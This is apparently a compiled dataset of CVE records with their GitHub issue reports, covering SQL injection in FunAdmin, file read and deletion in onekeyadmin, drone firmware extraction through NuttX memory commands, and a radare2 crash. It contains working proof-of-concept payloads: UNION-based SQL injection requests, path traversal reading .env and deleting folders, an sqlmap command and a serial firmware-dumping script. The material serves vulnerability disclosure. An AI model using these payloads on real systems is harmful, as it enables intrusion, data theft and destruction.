Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Vulnerability occurs in plugin - database management plugin <img width="1231" alt="image" src="https://user-images.githubusercontent.com/122217858/215309458-00d0c9dc-de41-48ab-9ba2-b146bb6877ea.png"> Code Audit Process Vulnerability occurs in app\databases\controller\Database.php#edit method <img width="1221" alt="image" src="https://user-images.githubusercontent.com/122217858/215309476-aeff1b23-62a3-42c5-8291-a5e2c0e00e86.png"> Get the id directly and splice it into the sql statement Vulnerability recurrence Conditions: background administrator rights sqlmap poc save as txt `POST /databases/database/edit?id=fun_addon* HTTP/1.1 Host: 192.168.3.129:8092 Content-Length: 187 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Connection: close TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&__token__=d659d1ffb4e68ff1910c1c7c75a43539` python sqlmap.py -r poc.txt <img width="995" alt="image" src="https://user-images.githubusercontent.com/122217858/215309539-1a710a2b-67a6-4667-a770-33adfccc4137.png">
Database management plug-in database.php edit-sql registration vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/3/comments
2
2023-01-29T06:36:55Z
2023-05-05T06:40:39Z
https://github.com/funadmin/funadmin/issues/3
1,561,149,146
3
4,820
CVE-2023-24777
2023-03-08T22:15:09.797
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/table/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/funadmin/funadmin/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:funadmin:funadmin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "CC800090-6420-4971-831D-1E77A18BD45E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/funadmin/funadmin/issues/5
[ "Exploit", "Issue Tracking" ]
github.com
[ "funadmin", "funadmin" ]
Vulnerability Product:funadmin Vulnerability version:.3.2.0 Vulnerability type:sql injection Vulnerability Details๏ผš Database management plug-in table.php list-sql injection vulnerability Vulnerability occurs in plugin - database management plugin <img width="1220" alt="image" src="https://user-images.githubusercontent.com/122217858/215309671-e8eaf6cb-5359-4f04-a425-d6ec4a0289c1.png"> Code Audit Process Vulnerability occurs in app\databases\controller\table.php#list method <img width="1224" alt="image" src="https://user-images.githubusercontent.com/122217858/215309683-188cfbfc-b37e-4a11-84fa-0153a7c04ade.png"> <img width="1210" alt="image" src="https://user-images.githubusercontent.com/122217858/215309687-9b115362-c5b8-4e8b-a7f9-e1e5ffb14d69.png"> Get the id directly and splice it into the sql statement Vulnerability recurrence `POST /databases/table/list?id='+UNION+ALL+SELECT+NULL,CONCAT(0x7162626b71,user(),0x71766a6b71),NULL,NULL,NULL,NULL,NULL,NULL%23 HTTP/1.1 Host: 192.168.3.129:8092 Content-Length: 187 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.3.129:8092 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D Connection: close TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&__token__=d659d1ffb4e68ff1910c1c7c75a43539` <img width="1217" alt="image" src="https://user-images.githubusercontent.com/122217858/215309705-f134b98e-749f-4bc8-8b56-6b021e9895df.png">
Database management plug-in table.php list-sql injection vulnerability
https://api.github.com/repos/funadmin/funadmin/issues/5/comments
1
2023-01-29T06:40:52Z
2023-05-05T06:40:40Z
https://github.com/funadmin/funadmin/issues/5
1,561,149,983
5
4,821
CVE-2023-26948
2023-03-09T01:15:10.383
onekeyadmin v1.3.9 was discovered to contain an arbitrary file read vulnerability via the component /admin1/file/download.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "552" ]
552
https://github.com/keheying/onekeyadmin/issues/5
[ "Exploit", "Issue Tracking" ]
github.com
[ "keheying", "onekeyadmin" ]
1. Vulnerability affects product:onekeyadmin 2. Vulnerability affects version 1.3.9 3. Vulnerability type:file reading 4. Vulnerability Details๏ผš Vulnerability location Vulnerability occurs in The app\admin\controller\File#download method directly does not filter the incoming url, causing arbitrary file reading <img width="982" alt="image" src="https://user-images.githubusercontent.com/122217858/211448532-536eda57-ef0d-4d39-addb-5b7f526760d2.png"> Vulnerability reproduction Read the database configuration file.env `GET /admin1/file/download?url=../.env&title=่‹ฑๆ–‡.png HTTP/1.1 Host: 192.168.3.129:8091 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.3.129:8091/admin1/file/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close` <img width="935" alt="image" src="https://user-images.githubusercontent.com/122217858/211448592-f132bba5-1548-438e-bb5c-d65b5fc492c1.png">
Background arbitrary file reading vulnerability 2
https://api.github.com/repos/keheying/onekeyadmin/issues/5/comments
1
2023-01-10T02:32:14Z
2023-03-20T02:12:46Z
https://github.com/keheying/onekeyadmin/issues/5
1,526,662,071
5
4,822
CVE-2023-26957
2023-03-09T21:15:10.963
onekeyadmin v1.3.9 was discovered to contain an arbitrary file delete vulnerability via the component \admin\controller\plugins.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/keheying/onekeyadmin/issues/3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onekeyadmin:onekeyadmin:1.3.9:*:*:*:*:*:*:*", "matchCriteriaId": "308108A9-2A64-4A1D-A631-8E0D4820E7C6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "862" ]
862
https://github.com/keheying/onekeyadmin/issues/3
[ "Exploit", "Issue Tracking" ]
github.com
[ "keheying", "onekeyadmin" ]
Vulnerability affects product:onekeyadmin Vulnerability affects version 1.3.9 Vulnerability type:file delete Vulnerability Details๏ผš Vulnerability location Vulnerability occurs in app\admin\controller\plugins#delete method <img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211448184-cbc2f44f-3294-4e15-ac66-8eb9a975ee2d.png"> Here the delDirAndFile method of use onekey\File# is called <img width="979" alt="image" src="https://user-images.githubusercontent.com/122217858/211448228-b237bd17-cb4a-4e48-aec5-e4979aaaf313.png"> Vulnerability recurrence Conditions: background administrator rights Next I will delete the E:\onekeyadmin-main\public\111\ directory `POST /admin1/plugins/delete HTTP/1.1 Host: 192.168.3.129:8091 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.3.129:8091/admin1 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7 Connection: close Content-Length: 17 Content-Type: application/json {"name":"../111"}` <img width="992" alt="image" src="https://user-images.githubusercontent.com/122217858/211448297-9356a5d9-069c-4417-a777-828415fb1473.png">
Background arbitrary folder deletion vulnerability
https://api.github.com/repos/keheying/onekeyadmin/issues/3/comments
1
2023-01-10T02:29:40Z
2023-03-20T02:15:29Z
https://github.com/keheying/onekeyadmin/issues/3
1,526,660,136
3
4,823
CVE-2021-34125
2023-03-09T23:15:10.657
An issue discovered in Yuneec Mantis Q and PX4-Autopilot v 1.11.3 and below allow attacker to gain access to sensitive information via various nuttx commands.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/swkim101/f473b9a60e6d4635268402a2cd2025ac" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PX4/PX4-Autopilot/issues/17062" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/PX4/PX4-Autopilot/pull/17264/commits/555f900cf52c0057e4c429ff3699c91911a21cab" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/apache/incubator-nuttx-apps/pull/647/commits/2fc1157f8585acc39f13a31612ebf890f41e76ca" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/apache/incubator-nuttx/pull/3292/commits/016873788280ca815ba886195535bbe601de6e48" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://nuttx.apache.org/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://nuttx.apache.org/docs/latest/applications/nsh/commands.html#access-memory-mb-mh-and-mw" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://www.st.com/resource/en/application_note/dm00493651-introduction-to-stm32-microcontrollers-security-stmicroelectronics.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/swkim101/f473b9a60e6d4635268402a2cd2025ac" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/PX4/PX4-Autopilot/issues/17062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/PX4/PX4-Autopilot/pull/17264/commits/555f900cf52c0057e4c429ff3699c91911a21cab" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/apache/incubator-nuttx-apps/pull/647/commits/2fc1157f8585acc39f13a31612ebf890f41e76ca" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/apache/incubator-nuttx/pull/3292/commits/016873788280ca815ba886195535bbe601de6e48" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://nuttx.apache.org/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://nuttx.apache.org/docs/latest/applications/nsh/commands.html#access-memory-mb-mh-and-mw" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://www.st.com/resource/en/application_note/dm00493651-introduction-to-stm32-microcontrollers-security-stmicroelectronics.pdf" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dronecode:px4_drone_autopilot:*:*:*:*:*:*:*:*", "matchCriteriaId": "3811D6B0-2D21-4002-8B51-9B4677E23BD4", "versionEndExcluding": null, "versionEndIncluding": "1.11.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:yuneec:mantis_q_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "2E52A1AA-D4BD-40AE-A3DC-022519C77427", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:yuneec:mantis_q:-:*:*:*:*:*:*:*", "matchCriteriaId": "1213853B-D18D-461D-9947-DE9965AE9418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "200" ]
200
https://github.com/PX4/PX4-Autopilot/issues/17062
[ "Exploit", "Issue Tracking" ]
github.com
[ "PX4", "PX4-Autopilot" ]
## Nsh's `mb`, `mh`, and `mw` commands can leak intellectual property. Exploiting those commands makes it possible to extract firmware from the flash memory because `mb`, `mh`, and `mw` can read the firmware code at an arbitrary location. You may know that some commercial vendors can customize their firmware without opening even binary code. However, those commands can neutralize the intellectual protection scheme to prevent from reading binary firmware code. We found this issue on [Yuneec](https://us.yuneec.com/), a commercial drone vendor, which has sold multiple drone models such as Typhoon H. This drone vendor has made efforts to protect its firmware from reading out, applying [ST's hardware read protection](https://www.st.com/resource/en/application_note/dm00186528-proprietary-code-read-out-protection-on-microcontrollers-of-the-stm32f4-series-stmicroelectronics.pdf) to its drones. Nevertheless, the `mb 0x8000000` command naively prints Typhoon H's firmware binary code, bypassing the protection scheme. PoC is as follows: ```python import serial ser = serial.Serial( port='COM7',\ baudrate=57600,\ parity=serial.PARITY_NONE,\ stopbits=serial.STOPBITS_ONE,\ bytesize=serial.EIGHTBITS,\ timeout=0) f = open('output_db000.txt', 'wb') for addr in range(0x080db000, 0x08200000, 0x1000): count = 0 ser.write(b'mw ') ser.write(bytes(hex(addr), 'ascii')) ser.write(b' 1000\r\n') print(hex(addr)) while True: line = ser.readline() f.write(line) #print(line) if(len(line) <= 5 and count != 0): break count += 1 f.close() ``` Only if possible, we believe the best way to prevent this vulnerability is to remove mb, mh, and mw commands. If that is not allowed due to debugging purpose, we would like to suggest the following actions can help protect intellectual properties from this vulnerability: (1) please add comments in the source code. (2) please show warnings in compile messages. (3) please disable those commands in the default configuration (`CONFIG_NSH_DISABLE_MW=y`)
Nsh Debug Commands Vulnerability Report
https://api.github.com/repos/PX4/PX4-Autopilot/issues/17062/comments
6
2021-03-09T07:14:00Z
2023-12-04T03:09:28Z
https://github.com/PX4/PX4-Autopilot/issues/17062
825,439,181
17,062
4,824
CVE-2023-27114
2023-03-10T02:15:58.403
radare2 v5.8.3 was discovered to contain a segmentation fault via the component wasm_dis at p/wasm/wasm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/radareorg/radare2/commit/a15067a8eaa836bcc24b0882712c14d1baa66509" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/radareorg/radare2/issues/21363" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/radareorg/radare2/commit/a15067a8eaa836bcc24b0882712c14d1baa66509" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/radareorg/radare2/issues/21363" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:5.8.3:*:*:*:*:*:*:*", "matchCriteriaId": "51E5C30E-2343-42D6-B6FA-C50BCFA549AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/radareorg/radare2/issues/21363
[ "Exploit", "Issue Tracking" ]
github.com
[ "radareorg", "radare2" ]
## Description When parsing the wasm file with r2, using the `pd` command may result in a segmentation fault, because `NULL` was incorrectly passed to `strdup`. ## Environment ```sh # date Mon Feb 20 02:38:13 AKST 2023 # r2 -v radare2 5.8.3 0 @ linux-x86-64 git.5.8.3 commit: 5.8.3 build: 2023-02-16__23:25:48 # uname -ms Linux x86_64 ``` Commit : 39f42922d806d5519dcbb32dd3a6d313d888bfd6 ## Proof of concept [poc.wasm](https://github.com/radareorg/radare2/files/10784008/poc.txt) ## Stack dump ``` pwndbg> r /pwn/poc.wasm Starting program: /usr/local/bin/r2 /pwn/poc.wasm [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". ERROR: unknown section id: 13 ERROR: unknown section id: 109 -- Check your IO plugins with 'r2 -L' [0x000000be]> pd Program received signal SIGSEGV, Segmentation fault. __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 65 ../sysdeps/x86_64/multiarch/strlen-avx2.S: No such file or directory. pwndbg> context LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ REGISTERS / show-flags off / show-compact-regs off ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ RAX 0x0 *RBX 0x555555555640 (__libc_csu_init) โ—‚โ€” endbr64 RCX 0x0 RDX 0x0 RDI 0x0 *RSI 0x555555680729 โ—‚โ€” 0x1000005555550000 *R8 0x7ffff6df5852 (wasm_decode) โ—‚โ€” endbr64 *R9 0x1f *R10 0x555555559010 โ—‚โ€” 0x6000700070007 *R11 0x7ffff7d95be0 (main_arena+96) โ€”โ–ธ 0x55555582bd80 โ—‚โ€” 0x0 *R12 0x5555555551c0 (_start) โ—‚โ€” endbr64 *R13 0x7fffffffe6d0 โ—‚โ€” 0x2 R14 0x0 R15 0x0 RBP 0x0 *RSP 0x7fffffffcb48 โ€”โ–ธ 0x7ffff7c48383 (strdup+19) โ—‚โ€” lea r12, [rax + 1] *RIP 0x7ffff7d316e5 (__strlen_avx2+21) โ—‚โ€” vpcmpeqb ymm1, ymm0, ymmword ptr [rdi] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ DISASM / x86-64 / set emulate on ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ–บ 0x7ffff7d316e5 <__strlen_avx2+21> vpcmpeqb ymm1, ymm0, ymmword ptr [rdi] 0x7ffff7d316e9 <__strlen_avx2+25> vpmovmskb eax, ymm1 0x7ffff7d316ed <__strlen_avx2+29> test eax, eax 0x7ffff7d316ef <__strlen_avx2+31> jne __strlen_avx2+272 <__strlen_avx2+272> โ†“ 0x7ffff7d317e0 <__strlen_avx2+272> tzcnt eax, eax 0x7ffff7d317e4 <__strlen_avx2+276> add rax, rdi 0x7ffff7d317e7 <__strlen_avx2+279> sub rax, rdx 0x7ffff7d317ea <__strlen_avx2+282> vzeroupper 0x7ffff7d317ed <__strlen_avx2+285> ret 0x7ffff7d317ee <__strlen_avx2+286> nop 0x7ffff7d317f0 <__strlen_avx2+288> tzcnt eax, eax โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ STACK ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ 00:0000โ”‚ rsp 0x7fffffffcb48 โ€”โ–ธ 0x7ffff7c48383 (strdup+19) โ—‚โ€” lea r12, [rax + 1] 01:0008โ”‚ 0x7fffffffcb50 โ€”โ–ธ 0x555555680729 โ—‚โ€” 0x1000005555550000 02:0010โ”‚ 0x7fffffffcb58 โ€”โ–ธ 0x7fffffffcca0 โ€”โ–ธ 0x7fffffffcd00 โ€”โ–ธ 0x7fffffffcd40 โ€”โ–ธ 0x7fffffffcda0 โ—‚โ€” ... 03:0018โ”‚ 0x7fffffffcb60 โ€”โ–ธ 0x5555555551c0 (_start) โ—‚โ€” endbr64 04:0020โ”‚ 